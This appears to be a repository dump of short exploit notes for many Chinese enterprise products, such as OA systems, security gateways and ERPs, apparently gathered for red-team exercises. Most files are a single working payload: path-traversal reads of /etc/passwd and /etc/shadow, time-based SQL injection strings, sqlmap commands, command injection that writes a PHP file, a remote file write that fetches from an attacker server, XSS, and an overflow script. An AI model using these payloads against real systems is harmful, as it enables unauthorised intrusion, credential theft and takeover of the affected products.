├── Untitled.md
├── 迈普-多业务融合网关-信息泄露.md
├── 甄云 SRM 云平台 SpEL 表达式注入漏洞.md
├── 360天擎 - 未授权访问.md
├── 锐捷EG350易网关管理系统存在信息泄露漏洞.md
├── 飞企互联loginService任意登录.md
├── Sharp 多功能打印机未授权访问漏洞.md
├── 360 新天擎终端安全管理系统存在信息泄露漏洞.md
├── 杭州雄威餐厅数字化综合管理平台存在存在绕过认证导致任意密码重置漏洞.md
├── 网康 NS-ASG 信息泄露漏洞.md
├── .gitattributes
├── 九思-OA-任意文件上传.md
├── 海康威视教育综合安防管理系统admintoken泄露.md
├── 锐捷RG-NBS2026G-P交换机WEB管理 ping.htm 未授权访问漏洞.md
├── Apache ActiveMQ远程命令执行漏洞.md
├── LiveNVR流媒体服务软件存在未授权访问漏洞.md
├── 福建科立讯通信 指挥调度管理平台 ajax_users.php 信息泄露漏洞.md
├── 紫光-电子档案管理系统-PermissionAC.md
├── 360天擎 - sql注入.md
├── 拓尔思-TRSWAS5.0-PermissionAC文件上传.md
├── 超级猫签名APP分发平台前台远程文件写入漏洞.md
├── 金和OA_SAP_B1Config.aspx未授权访问漏洞.md
├── H3C网络管理系统任意文件读取漏洞.md
├── 联软安渡 UniNXG 安全数据交换系统SQL 注入漏洞.md
├── 飞讯云WMS MyDownMylmportData 前台SQL注入.md
├── Bazarr swaggerui任意文件读取漏洞.md
├── 天问物业ERP系统ContractDownLoad存在任意文件读取漏洞.md
├── 广州图创-图书馆集群管理系统-PermissionAC.md
├── 锐捷M18000-WS-ED无线控制器存在CRL命令注入.md
├── 万户协同办公平台ezoffice DocumentEdit_unite.jsp SQL注入漏洞.md
├── KubePi存在JWT验证绕过漏洞.assets
└── image-20240806095638556.png
├── Bazarr swaggerui组件目录穿越导致任意文件读取漏洞.md
├── D-LINK-DIR-845L接口bsc_sms_inbox.php存在信息泄露漏洞(CVE-2024-33113).md
├── F5 BIG-IP 远程代码执行漏洞.md
├── 锐捷RG-NAC统一上网行为管理与审计系统存在远程代码执行漏洞.md
├── 电信网关 ipping.php 命令执行漏洞.assets
└── image-20240729092933849.png
├── 万户OA SQL注入漏洞.md
├── 小学智慧校园信息管理系统 Upload 文件上传漏洞.assets
└── image-20240729093018380.png
├── 易宝OA 存在BasicService存在任意文件上传漏洞.assets
└── image-20240729092805340.png
├── Check-Point安全网关任意文件读取漏洞(CVE-2024-24919).md
├── H3C-SecParh堡垒机任意用户登录漏洞.md
├── JeePlus快速开发平台resetpassword存在SQL注入漏洞.md
├── 安恒明御安全网关远程命令执行漏洞.md
├── 启明星辰 天玥网络安全审计系统 SQL 注入漏洞.md
├── 满客宝智慧食堂系统 downloadWebFile 任意文件读取漏洞.md
├── H3C Workspace 云桌面 远程命令执行漏洞(XVE-2024-8180).md
├── 用友-畅捷通CRM-任意文件上传.md
├── 金和 OA C6 GeneralXmlhttpPage.aspx SQL 注入漏洞.md
├── 帆软报表 channel 远程命令执行漏洞.md
├── WVP视频平台(国标28181)未授权SQL注入漏洞.md
├── JeecgBoot反射型XSS漏洞.md
├── 建文工程管理系统 download2 文件读取漏洞.md
├── Coremail邮件系统未授权访问获取管理员账密.md
├── Tenda 03 代码执行漏洞(CVE-2024-6963).md
├── 泛微ecology系统setup接口存在信息泄露漏洞.md
├── Tenda FH1201 v1.2.0.14接口exeCommand存在远程命令执行漏洞(CVE-2024-41468).md
├── 网神SecSSL3600安全接入网关系统任意密码修改漏洞.md
├── 用友时空KSOA系统接口PrintZPFB.jsp存在SQL注入漏洞.md
├── 金和OA jc6 clobfield SQL注入漏洞.md
├── 用友时空KSOA PreviewKPQT SQL注入漏洞.md
├── 科荣AIO moffice SQL注入漏洞.md
├── Netgear-WN604接口downloadFile.php信息泄露漏洞.md
├── 天问物业 ERP 系统 AreaAvatarDownLoad.aspx 任意文件读取漏洞.md
├── 用友时空KSOA系统接口PrintZP.jsp存在SQL注入漏洞.md
├── 用友时空KSOA系统接口fillKP.jsp存在SQL注入漏洞.md
├── 用友时空KSOA系统接口PrintZPYG.jsp存在SQL注入漏洞.md
├── 安恒-下一代防火墙-RCE.md
├── 用友时空KSOA系统接口PrintZPZP.jsp存在SQL注入漏洞.md
├── 金和OA任意文件读取漏洞.md
├── 宏脉医美行业管理系统DownLoadServerFile任意文件读取下载漏洞.md
├── panabit日志审计系统sprog_upstatus存在SQL注入漏洞.md
├── 喰星云·数字化餐饮服务系统not_out_depot存在SQL注入漏洞.md
├── 致远AnalyticsCloud 分析云存在任意文件读取漏洞.md
├── Tenda FH1201 v1.2.0.14接口WriteFacMac存在远程命令执行漏洞(CVE-2024-41473).md
├── 宏脉医疗DownLoadServerFile任意文件读取下载漏洞.md
├── 华天动力-OA-downloadWpsFile任意文件读取.md
├── 证书查询系统存在任意文件读取漏洞.md
├── 通天星 CMSV6 车载视频监控平台 disable 存在 SQL 注入漏洞.md
├── 福建科立讯通信 指挥调度管理平台 ajax_users.php SQL 注入漏洞.md
├── 1Panel 远程代码执行漏洞(XVE-2024-17699).md
├── RAISECOM网关设备list_base_config.php存在远程命令执行漏洞.md
├── fogproject系统接口export.php存在远程命令执行漏洞.md
├── 北京派网软件有限公司Panabit-Panalog大数据日志审计系统sprog_upstatus.php存在SQL注入漏洞(CVE-2024-2014).md
├── 金万维云联应用系统接入平台RCE.md
├── 福建科立讯通信 指挥调度管理平台存在远程命令执行漏洞.md
├── 科讯校园一卡通管理系统 get_kq_tj_today SQL注入漏洞.md
├── 赛蓝企业管理系统GetJSFile存在任意文件读取漏洞.md
├── 金万维-云联应用系统接入平台GNRemote.dll前台存在RCE漏洞.md
├── 用友 U8 cloud MonitorServlet 反序列化漏洞.md
├── 科讯校园一卡通管理系统 dormitoryHealthRankingSQL注入漏洞.md
├── 天玥网络安全审计系统 SQL 注入漏洞.md
├── 天问物业ERP系统OwnerVacantDownLoad存在任意文件读取漏洞.md
├── 宏景eHR-HCM-DisplayExcelCustomReport接口存在任意文件读取漏洞.md
├── 竹云 信息泄露.md
├── 天问物业ERP系统VacantDiscountDownLoad存在任意文件读取漏洞.md
├── 数字通云平台智慧政务 time SQL注入漏洞.md
├── SuiteCRM responseEntryPoint存在SQL注入漏洞.md
├── 泛微E-Mobile installOperate.do SSRF漏洞.md
├── 1Panel面板最新前台RCE漏洞.md
├── 方天云智慧平台系统 GetCustomerLinkman SQL注入漏洞.md
├── 金和OA_jc6_viewConTemplate.action存在FreeMarker模板注入漏洞.md
├── 通达OA V11.10 login.php SQL注入漏洞.md
├── 西软云XMS-futurehoteloperate接口存在XXE漏洞.md
├── 金和OA-C6-IncentivePlanFulfill.aspx存在SQL注入漏洞.md
├── 亿赛通数据泄露防护(DLP)系统 NetSecConfigAjax SQL 注入漏洞.md
├── ServiceNowUI Macros CVE-2024-4879 模板注入漏洞.md
├── 用友-U8-Cloud-文件上传.md
├── 魔方网表 mailupdate.jsp 接口 任意文件上传.md
├── 华磊科技物流modifyInsurance sql注入漏洞.md
├── 用友U8 Cloud ActionServlet SQL注入漏洞.md
├── 汇智ERP filehandle.aspx 任意文件读取漏洞.md
├── Quicklancer存在SQL注入漏洞.md
├── 万户-ezOFFICE-OA-officeserver.jsp文件上传漏洞.md
├── 广联达-Linkworks-GetAllData接口存在未授权访问.md
├── 用友NC Cloud queryStaffByName SQL注入漏洞.md
├── 联软安渡UniNXG安全数据交换系统poserver.zz存在任意文件读取漏洞.md
├── JeecgBoot积木报表存在SQL注入.md
├── 泛微e-cology9 存在SSRF漏洞.md
├── 赛蓝企业管理系统 DownloadBuilder 任意文件读取漏洞.md
├── 华磊科技物流getOrderTrackingNumber存在sql注入漏洞.md
├── 致远constDef接囗存在代码执行漏洞.md
├── aiohttp存在目录遍历漏洞(CVE-2024-23334).md
├── 超级猫签名APP分发平台前台存在SQL注入漏洞.md
├── 用友U8 Cloud MeasureQueryFrameAction SQL注入漏洞.md
├── eking管理易FileUpload接口存在任意文件上传漏洞.md
├── 全息AI网络运维平台存在命令执行漏洞.md
├── 深信服-下一代防火墙-RCE.md
├── 致远互联FE协作办公平台apprvaddNew存在SQL注入.md
├── 微信公众平台-无限回调系统-SQL注入.md
├── 用友GRPA++Cloud 政府财务云 selectGlaDatasourcePreview SQL注入漏洞.md
├── 金和OA_HomeService.asmxSQL注入.md
├── 瑞斯康达多业务智能网关RCE.md
├── 用友 UAP querygoodsgridbycode SQL 注入.md
├── Array VPN任意文件读取漏洞.md
├── 蓝凌 EKP 远程代码执行漏洞.md
├── 蓝凌EIS智慧协同平台frm_button_func.aspx SQL注入.md
├── 蓝凌EIS智慧协同平台frm_form_list_main.aspx SQL注入.md
├── 瑞斯康达-多业务智能网关-RCE.md
├── 万户ezOFFICE协同管理平台 getAutoCode SQL注入漏洞.md
├── 深信服下一代防火墙NGAF存在任意文件上传漏洞.md
├── 蓝凌EIS智慧协同平台ShowUserInfo.aspx SQL注入.md
├── 蓝凌EIS智慧协同平台fl_define_flow_chart_show.aspx SQL注入.md
├── 蓝凌EIS智慧协同平台UniformEntry.aspx SQL注入.md
├── 金和OA_C6_UploadFileDownLoadnew存在任意文件读取漏洞.md
├── 蓝凌EIS智慧协同平台doc_fileedit_word.aspx SQL注入.md
├── 科拓全智能停车视频收费系统CancelldList存在SQL注入漏洞.md
├── 金和OAC6-FileDownLoad.aspx任意文件读取漏洞.md
├── 喰星云-数字化餐饮服务系统shelflife.php存在SQL注入漏洞.md
├── 拓尔思TRS媒资管理系统任意文件上传.md
├── 29网课交单平台epay.php存在SQL注入漏洞.md
├── 喰星云-数字化餐饮服务系统not_finish.php存在SQL注入漏洞.md
├── 金和OA_jc6_Upload任意文件上传.md
├── 喰星云-数字化餐饮服务系统stock.php存在SQL注入漏洞.md
├── 金和OA_MailTemplates.aspx_SQL注入漏洞.md
├── 建文工程管理系统desktop.ashx存在SQL注入漏洞.md
├── 金和OA_uploadfileeditorsave接口存在任意文件上传漏洞.md
├── 科荣AIO系统UtilServlet存在任意命令执行漏洞.md
├── 绿盟 SAS堡垒机 Exec 远程命令执行漏洞.md
├── 飞讯云MyImportData前台SQL注入.md
├── 百易云资产管理运营系统任意文件上传.md
├── 锐捷-EG易网关存在RCE漏洞.md
├── 小学智慧校园信息管理系统 Upload 文件上传漏洞.md
├── H3C-校园网自助服务系统flexfileupload任意文件上传漏洞.md
├── 方天云智慧平台系统文件上传.md
├── 润乾报表InputServlet存在任意文件上传漏洞.md
├── 赛蓝企业管理系统ReadTxtLog存在任意文件读取漏洞.md
├── 指尖云平台-智慧政务payslip SQL注入漏洞.md
├── 数字通指尖云平台-智慧政务payslip SQL注入漏洞.md
├── 资管云--任意文件上传.md
├── Panalog 日志审计系统 SQL 注入漏洞.md
├── 云课网校系统uploadImage存在任意文件上传漏洞.md
├── 安恒明御安全网关rce.md
├── 湖南众合百易信息技术有限公司 资产管理运营系统 comfileup.php 前台文件上传漏洞.md
├── 金慧综合管理信息系统SQL注入漏洞.md
├── 用友U9-UMWebService.asmx存在文件读取漏洞.md
├── 金和OA_upload_json.asp存在任意文件上传漏洞.md
├── 创客13星零售商城系统RCE.md
├── 泛微OA E-Office V10 OfficeServer 任意文件上传.md
├── AEGON-LIFEv1.0存在SQL注入漏洞(CVE-2024-36597).md
├── SpringBlade系统menu接口存在SQL注入漏洞.md
├── Confluence远程命令执行漏洞(CVE-2024-21683).md
├── 泛微OA E-Cology存在SQL注入漏洞.md
├── 泛微E-office-10接口leave_record.php SQL注入漏洞.md
├── 海康威视综合安防管理平台前台RCE.md
├── T18-1TOTOLINK-A6000R-RCE.md
├── 网康 NS-ASG sql 注入漏洞.md
├── AJ-Report开源数据大屏存在远程命令执行漏洞.md
├── 云时空商业ERP文件上传.md
├── 金和OA_jc6_ntko-upload任意文件上传漏洞.md
├── 用友畅捷通-TPlus系统接口ajaxpro存在ssrf漏洞.md
├── 用友 NC Cloud jsinvoke 任意文件上传.md
├── 用友U8 CRM import.php 文件上传漏洞.md
├── H3C密码泄露漏洞.md
├── 海康卫视综合安防 uploadAllPackage任意文件上传.md
├── 万户ezoffice wpsservlet任意文件上传.md
├── 用友u8-cloud RegisterServlet SQL注入.md
├── 锐捷统一上网行为管理与审计系统 static_convert.php 命令执行.md
├── 用友-CRM客户关系管理系统-任意文件上传.md
├── 用友U8 Cloud linkntb存在SQL注入漏洞.md
├── 同享TXEHR V15人力管理管理平台DownloadFile存在任意文件下载漏洞.md
├── IP网络广播服务平台存在任意文件上传漏洞.md
├── 亿赛通数据泄露防护(DLP)系统NoticeAjax接口存在SQL注入漏洞.md
├── 海洋CMS后台admin_smtp.php存在远程代码执行漏洞.md
├── DedeCMSV5.7.114后台sys_verizes.php存在远程代码执行漏洞.md
├── 泛微HrmService存在SQL注入漏洞.md
├── 因酷教育平台RCE(CVE-2024-35570).md
├── 蓝凌EKP存在sys_ui_component远程命令执行漏洞 .md
├── 电信网关 ipping.php 命令执行漏洞.md
├── 宏景eHR sdutygetSdutyTree SQL注入.md
├── H3C-CVM-upload接口前台任意文件上传漏洞.md
├── 启明星辰-天清汉马VPN接口download任意文件读取.md
├── 帆软未授权命令执行.md
├── 泛微 e-cology9 servicesWorkPlanService 前台SQL注入.md
├── 建文工程项目管理软件BusinessManger存在SQL注入漏洞.md
├── 易宝OA ExecuteSqlForSingle SQL注入漏洞.md
├── 创客13星零售商城系统前台任意文件上传漏洞.md
├── 易宝OA 存在BasicService存在任意文件上传漏洞.md
├── 好视通视频会议系统存在任意文件读取漏洞.md
├── 用友NC任意文件读取.md
├── 深澜计费管理系统strategy存在反序列化漏洞.md
├── 任我行协同CRM反序列化漏洞.md
├── 明源云ERP接口ApiUpdate.ashx文件上传漏洞.md
├── F-logic DataCube3存在命令执行漏洞.md
├── Jetbrains_Teamcity_远程代码执行漏洞_CVE_2023_42793.md
├── 泛微云桥文件上传.md
├── APP分发签名系统index-uplog.php存在任意文件上传漏洞.md
├── 海康威视综合安防管理平台icenseExpire.do存在远程命令执行漏洞.md
├── Docassemble任意文件读取漏洞(CVE-2024-27292).md
├── 捷诚管理信息系统 SQL注入漏洞.md
├── 山石网科云鉴存在前台任意命令执行漏洞.md
├── 科荣 AIO 管理系统任意文件读取.md
├── 用友U9系统DoQuery接口存在SQL注入.md
├── H3C Magic B1STV100R012 RCE.md
├── 致远 OA fileUpload.do 前台文件上传绕过漏洞.md
├── Adobe-ColdFusion任意文件读取漏洞CVE-2024-20767.md
├── 铭飞MCMS 远程代码执行漏洞.md
├── H3C 用户自助服务平台 dynamiccontent.properties.xhtml存在RCE漏洞.md
├── 红海云eHR kqFile.mob 任意文件上传.md
├── 禅道研发项⽬管理系统未授权.md
├── 邦永PM2项目管理平台系统ExcelIn.aspx存在任意文件上传漏洞.md
├── 猎鹰安全(金山)终端安全系统V9 远程代码执行漏洞.md
├── DedeCMSV5.7.114后台article_template_rand.php存在远程代码执行漏洞.md
├── 金和OA_CarCardInfo.aspx_SQL注入漏洞.md
├── KubePi存在JWT验证绕过漏洞.md
├── 广联达OA接口ArchiveWebService存在XML实体注入漏洞.md
├── 广联达Linkworks ArchiveWebService XML实体注入漏洞.md
├── Apache-CloudStack中的SAML身份验证漏洞(CVE-2024-41107).md
├── 润乾报表dataSphereServlet接口 任意文件读取漏洞.md
├── 用友NC-Cloud接口blobRefClassSearch存在FastJson反序列化漏洞.md
├── 泛微E-cology9 browserjsp SQL注入漏洞.md
├── 福建科立讯通信指挥调度管理平台任意文件上传.md
├── 润乾报表dataSphereServlet 任意文件上传漏洞.md
└── 帆软FineReport报表 ReportServer SQL注入getshell.md
/Untitled.md:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/迈普-多业务融合网关-信息泄露.md:
--------------------------------------------------------------------------------
1 | ```
2 | /.htpasswd/
3 | ```
4 |
5 |
--------------------------------------------------------------------------------
/甄云 SRM 云平台 SpEL 表达式注入漏洞.md:
--------------------------------------------------------------------------------
1 | /oauth/public/SpEL表达式/ab?username=bHM=
--------------------------------------------------------------------------------
/360天擎 - 未授权访问.md:
--------------------------------------------------------------------------------
1 | ```
2 | /api/dp/rptsvcsyncpoint?ccid=1
3 | ```
4 |
5 |
--------------------------------------------------------------------------------
/锐捷EG350易网关管理系统存在信息泄露漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | /tool/shell/nginx.conf
3 | ```
4 |
5 |
--------------------------------------------------------------------------------
/飞企互联loginService任意登录.md:
--------------------------------------------------------------------------------
1 | ```
2 | /loginService.fe?op=D
3 | ```
4 |
5 |
--------------------------------------------------------------------------------
/Sharp 多功能打印机未授权访问漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | /installed_emanual_list.html
3 | ```
4 |
5 |
--------------------------------------------------------------------------------
/360 新天擎终端安全管理系统存在信息泄露漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | /runtime/admin_log_confcache
3 | ```
4 |
5 |
--------------------------------------------------------------------------------
/杭州雄威餐厅数字化综合管理平台存在存在绕过认证导致任意密码重置漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | 重置密码处,改回包中的code字段为1
3 | ```
4 |
5 |
--------------------------------------------------------------------------------
/网康 NS-ASG 信息泄露漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | /configsave/manufacture-default.tar.gz
3 | ```
4 |
5 |
--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
1 | # Auto detect text files and perform LF normalization
2 | * text=auto
3 |
--------------------------------------------------------------------------------
/九思-OA-任意文件上传.md:
--------------------------------------------------------------------------------
1 | ```
2 | /jsoa/wpsforlinux/src/upload_l.jsp?openType=
3 | ```
4 |
5 |
--------------------------------------------------------------------------------
/海康威视教育综合安防管理系统admintoken泄露.md:
--------------------------------------------------------------------------------
1 | ```
2 | /portal/conf/config.properties
3 | ```
4 |
5 |
--------------------------------------------------------------------------------
/锐捷RG-NBS2026G-P交换机WEB管理 ping.htm 未授权访问漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | /safety/ping.htm
3 | ```
4 |
5 |
--------------------------------------------------------------------------------
/Apache ActiveMQ远程命令执行漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | https://github.com/Hutt0n0/ActiveMqRCE
3 | ```
4 |
5 |
--------------------------------------------------------------------------------
/LiveNVR流媒体服务软件存在未授权访问漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | /api/v1/device/channeltree?serial=&pcode
3 | ```
4 |
5 |
--------------------------------------------------------------------------------
/福建科立讯通信 指挥调度管理平台 ajax_users.php 信息泄露漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | /app/ext/ajax_users.php
3 | ```
4 |
5 |
--------------------------------------------------------------------------------
/紫光-电子档案管理系统-PermissionAC.md:
--------------------------------------------------------------------------------
1 | ```
2 | /Archive/ErecordOffice/openOfficeFile
3 | ```
4 |
5 |
--------------------------------------------------------------------------------
/360天擎 - sql注入.md:
--------------------------------------------------------------------------------
1 | ```
2 | /api/dp/rptsvcsyncpoint?ccid=1';SELECT PG_SLEEP(5)--
3 | ```
4 |
5 |
--------------------------------------------------------------------------------
/拓尔思-TRSWAS5.0-PermissionAC文件上传.md:
--------------------------------------------------------------------------------
1 | ```
2 | /mas/servlets/uploadThumb?appKey=sv&uploading=1
3 | ```
4 |
5 |
--------------------------------------------------------------------------------
/超级猫签名APP分发平台前台远程文件写入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | /user/profile/download?url=http://云服务器地址/111.php&path=1
3 | ```
4 |
5 |
--------------------------------------------------------------------------------
/金和OA_SAP_B1Config.aspx未授权访问漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | /C6/JHsoft.CostEAI/SAP_B1Config.aspx/?manage=1
3 | ```
4 |
5 |
--------------------------------------------------------------------------------
/H3C网络管理系统任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /webui/?file_name=../../../../../etc/passwd&g=sys_dia_data_down HTTP/1.1
3 | ```
4 |
5 |
--------------------------------------------------------------------------------
/联软安渡 UniNXG 安全数据交换系统SQL 注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | UniExServices/link/queryLinklnfo?address=';SELECT PG_SLEEP(5)--
3 | ```
4 |
5 |
--------------------------------------------------------------------------------
/飞讯云WMS MyDownMylmportData 前台SQL注入.md:
--------------------------------------------------------------------------------
1 | ```
2 | /MyDown/MyImportData?opeid=' WAITFOR DELAY '0:0:5'-- AtpN
3 | ```
4 |
5 |
--------------------------------------------------------------------------------
/Bazarr swaggerui任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | /api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd
3 | ```
4 |
5 |
--------------------------------------------------------------------------------
/天问物业ERP系统ContractDownLoad存在任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | /HM/M_Main/WorkGeneral/docfileDownLoad.aspx?AdjunctFile=../web.config
3 | ```
4 |
5 |
--------------------------------------------------------------------------------
/广州图创-图书馆集群管理系统-PermissionAC.md:
--------------------------------------------------------------------------------
1 | ```
2 | /interlibSSO/api/BrowseLogInterface?cmdACT=doDataFlowLogStatistic4ERM&sysid=1
3 | ```
4 |
5 |
--------------------------------------------------------------------------------
/锐捷M18000-WS-ED无线控制器存在CRL命令注入.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /web_config.do HTTP/1.1
3 |
4 | command=show+running-config&mode_url=exec
5 | ```
6 |
7 |
--------------------------------------------------------------------------------
/万户协同办公平台ezoffice DocumentEdit_unite.jsp SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | /defaultroot/public/iWebOfficeSign/DocumentEdit_unite.jsp;?RecordID=1
3 | ```
4 |
5 |
--------------------------------------------------------------------------------
/KubePi存在JWT验证绕过漏洞.assets/image-20240806095638556.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/KubePi存在JWT验证绕过漏洞.assets/image-20240806095638556.png
--------------------------------------------------------------------------------
/Bazarr swaggerui组件目录穿越导致任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
3 | ```
4 |
5 |
--------------------------------------------------------------------------------
/D-LINK-DIR-845L接口bsc_sms_inbox.php存在信息泄露漏洞(CVE-2024-33113).md:
--------------------------------------------------------------------------------
1 | ```
2 | /getcfg.php?a=%0A_POST_SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1
3 | ```
4 |
5 |
--------------------------------------------------------------------------------
/F5 BIG-IP 远程代码执行漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | https://github.com/adysec/nuclei_poc/blob/ce5a47e163f5440c84dbfc0adb073ab35f562154/poc/cve/CVE-2023-46747.yaml
3 | ```
4 |
5 |
--------------------------------------------------------------------------------
/锐捷RG-NAC统一上网行为管理与审计系统存在远程代码执行漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | /view/vpn/autovpn/online_check.php?peernode= | `echo PD9waHAgcGhwaW5mbygpOw== | base64 -d > 1.php`
3 | ```
4 |
5 |
--------------------------------------------------------------------------------
/电信网关 ipping.php 命令执行漏洞.assets/image-20240729092933849.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/电信网关 ipping.php 命令执行漏洞.assets/image-20240729092933849.png
--------------------------------------------------------------------------------
/万户OA SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 |
3 | python sqlmap.py -u "http://xxxxxxxxx/defaultroot/public/iWebOfficeSign/DocumentEdit_unite.jsp;?RecordID=1" --level 3 --dbs
4 | ```
5 |
6 |
--------------------------------------------------------------------------------
/小学智慧校园信息管理系统 Upload 文件上传漏洞.assets/image-20240729093018380.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/小学智慧校园信息管理系统 Upload 文件上传漏洞.assets/image-20240729093018380.png
--------------------------------------------------------------------------------
/易宝OA 存在BasicService存在任意文件上传漏洞.assets/image-20240729092805340.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ibaiw/2024Hvv/HEAD/易宝OA 存在BasicService存在任意文件上传漏洞.assets/image-20240729092805340.png
--------------------------------------------------------------------------------
/Check-Point安全网关任意文件读取漏洞(CVE-2024-24919).md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /clients/MyCRL HTTP/1.1
3 | Host: ip
4 | Content-Length: 39
5 |
6 | aCSHELL/../../../../../../../etc/shadow
7 | ```
8 |
9 |
--------------------------------------------------------------------------------
/H3C-SecParh堡垒机任意用户登录漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
3 | ```
4 |
5 |
--------------------------------------------------------------------------------
/JeePlus快速开发平台resetpassword存在SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | /kjds2022/a/sys/user/resetPassword?mobile=18888888888%27and%20(updatexml(1,concat(0x7e,(select%20md5(123456)),0x7e),1))%23
3 | ```
4 |
5 |
--------------------------------------------------------------------------------
/安恒明御安全网关远程命令执行漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /webui/?g=aaa_portal_auth_config_reset&type=echo '' >> /usr/local/webui/txzfsrur.php
3 | ```
4 |
5 |
--------------------------------------------------------------------------------
/启明星辰 天玥网络安全审计系统 SQL 注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | python sqlmap.py -u "https://ip/ops/index.php?c=Reportguide&a=checkrn" --data "checkname=123&tagid=123" --skip-waf --random-agent --dbs --batch --force-ssl
3 | ```
4 |
5 |
--------------------------------------------------------------------------------
/满客宝智慧食堂系统 downloadWebFile 任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 |
3 | GET /base/api/v1/kitchenVideo/downloadWebFile.swagger?fileName=a&ossKey=/jars/mkb-job-admin/application-prod-job-private.yml HTTP/1.1
4 | Host:
5 | ```
6 |
7 |
--------------------------------------------------------------------------------
/H3C Workspace 云桌面 远程命令执行漏洞(XVE-2024-8180).md:
--------------------------------------------------------------------------------
1 | ```
2 |
3 | /webui/?g=aaa_portal_auth_adv_submit&tab_name=广告模板&welcome_word=广告模板&btn_color=337ab7&suffix=.php&bkg_flag=0&check_btn_color=&des=undefined
4 | ```
5 |
6 |
--------------------------------------------------------------------------------
/用友-畅捷通CRM-任意文件上传.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
3 | Host:
4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
5 | ```
6 |
7 |
--------------------------------------------------------------------------------
/金和 OA C6 GeneralXmlhttpPage.aspx SQL 注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /C6/Jhsoft.Web.appraise/AppraiseScoreUpdate.aspx/GeneralXmlhttpPage.aspx/?id=%27and%28select%2B1%29%3E0waitfor%2F%2A%2A%2Fdelay%270%3A0%3A4 HTTP/1.1
3 | ```
4 |
5 |
--------------------------------------------------------------------------------
/帆软报表 channel 远程命令执行漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /webroot/decision/remote/design/channel HTTP/1.1
3 | Content-Type: application/json
4 | Host:
5 | cmd: id
6 | Connection: close
7 |
8 | {{gzip(file(fine10.bin))}}
9 | ```
10 |
11 |
--------------------------------------------------------------------------------
/WVP视频平台(国标28181)未授权SQL注入漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 |
3 | GET /api/push/list?page=1&count=15&query=1'&pushing=&mediaServerId= HTTP/1.1
4 | Host:
5 | Accept-Encoding: gzip, deflate, br
6 | Accept: */*
7 | Connection: close
8 | ```
9 |
10 |
--------------------------------------------------------------------------------
/JeecgBoot反射型XSS漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /userController.do?%3CsCrIpT%3Ealert(document.domain)%3C/sCrIpT%3E HTTP/1.1
3 | Host: {{Hostname}}
4 | User-Agent: Mozilla/5.0 (Macintosh; Intel MacOS X 10.15; rv:126.0) Gecko/20100101Firefox/126.0
5 | ```
6 |
7 |
--------------------------------------------------------------------------------
/建文工程管理系统 download2 文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | POST /Common/DownLoad2.aspx HTTP/1.1
3 | Host:
4 | Content-Type: application/x-www-form-urlencoded
5 | User-Agent: Mozilla/5.0
6 | Content-Length: 28
7 |
8 | path=../log4net.config&Name=
9 | ```
10 |
11 |
--------------------------------------------------------------------------------
/Coremail邮件系统未授权访问获取管理员账密.md:
--------------------------------------------------------------------------------
1 | ```
2 | /coremail/common/assets/;/;/;/;/;/;/s?__biz=MzI3MTk4NTcyNw==&mid=2247485877&idx=1&sn=7e5f77db320ccf9013c0b7aa72626e68&chksm=eb3834e5dc4fbdf3a9529734de7e6958e1b7efabecd1c1b340c53c80299ff5c688bf6adaed61&scene=2
3 | ```
4 |
5 |
--------------------------------------------------------------------------------
/Tenda 03 代码执行漏洞(CVE-2024-6963).md:
--------------------------------------------------------------------------------
1 | ```
2 |
3 | import requests
4 | ip ="192.168.84.101"
5 | url="http://"+ ip +"/goform/execommand"
6 | payload = b"a"*2000
7 |
8 | data = f"cmdinput": payload}
9 | response = requests.post(url, data=data)
10 | ```
11 |
12 |
--------------------------------------------------------------------------------
/泛微ecology系统setup接口存在信息泄露漏洞.md:
--------------------------------------------------------------------------------
1 | ```
2 | GET /cloudstore/ecode/setup/ecology_dev.zip HTTP/1.1
3 | Host: {{Hostname}}
